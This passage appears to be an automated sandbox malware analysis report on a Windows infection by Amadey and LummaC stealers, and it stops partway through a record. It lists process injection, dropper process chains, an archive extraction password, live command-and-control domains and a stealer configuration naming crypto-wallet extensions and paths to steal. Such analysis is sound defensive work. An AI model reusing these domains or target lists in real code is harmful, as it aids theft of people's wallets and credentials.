Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 535010 value: 00
LummaC encrypted strings found
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: rapeflowwj.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: crosshuaht.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: sustainskelet.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: aspecteirs.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: energyaffai.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: necklacebudi.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: discokeyus.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: grannyejh.lat
Source: b2885fa695.exe, 00000020.00000002.2760423898.00000000003D1000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: cheapptaxysu.click
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.00000000013C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: treehoneyi.click
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Thread register set: target process: 8060
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Thread register set: target process: 6284
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe "C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe "C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe "C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe "C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe "C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe "C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe "C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 6_2_00402744
Source: b2885fa695.exe, 00000020.00000002.2760571894.000000000059E000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: BProgram Manager
Source: skotes.exe, skotes.exe, 00000005.00000002.2938873786.0000000000382000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 69Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0016DD91 cpuid 5_2_0016DD91
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 6_2_0040247D
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Queries volume information: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00B0CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_001565E0 LookupAccountNameA, 5_2_001565E0
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA, 6_2_00405BFC
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
AV process strings found (often used to terminate AV products)
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: procmon.exe
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: wireshark.exe
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2692865661.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys Clipper DLL
Source: Yara match File source: 38.2.Gxtuum.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Gxtuum.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.72f44ceb0a.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.72f44ceb0a.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.0.Gxtuum.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.Gxtuum.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 5.2.skotes.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2930996247.0000000000151000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1713982339.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1683895756.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1724286059.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2281282422.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1754119546.0000000000151000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: b2885fa695.exe PID: 8036, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: b2885fa695.exe, 00000020.00000002.2764183695.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: b2885fa695.exe, 00000020.00000002.2764183695.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eh","ez":"TezBox"},{"en":"lodccjjbdhfakaekdiahmedfbieldgik","ez":"DAppPlay"},{"en":"ijmpgkjfkbfhoebgogflfebnmejmfbm","ez":"BitClip"},{"en":"lkcjlnjfpbikmcmbachjpdbijejflpcm","ez":"Steem Keychain"},{"en":"onofpnbbkehpmmoabgpcpmigafmmnjh","ez":"Nash Extension"},{"en":"bcopgchhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eh","ez":"TezBox"},{"en":"lodccjjbdhfakaekdiahmedfbieldgik","ez":"DAppPlay"},{"en":"ijmpgkjfkbfhoebgogflfebnmejmfbm","ez":"BitClip"},{"en":"lkcjlnjfpbikmcmbachjpdbijejflpcm","ez":"Steem Keychain"},{"en":"onofpnbbkehpmmoabgpcpmigafmmnjh","ez":"Nash Extension"},{"en":"bcopgchhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eh","ez":"TezBox"},{"en":"lodccjjbdhfakaekdiahmedfbieldgik","ez":"DAppPlay"},{"en":"ijmpgkjfkbfhoebgogflfebnmejmfbm","ez":"BitClip"},{"en":"lkcjlnjfpbikmcmbachjpdbijejflpcm","ez":"Steem Keychain"},{"en":"onofpnbbkehpmmoabgpcpmigafmmnjh","ez":"Nash Extension"},{"en":"bcopgchhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password 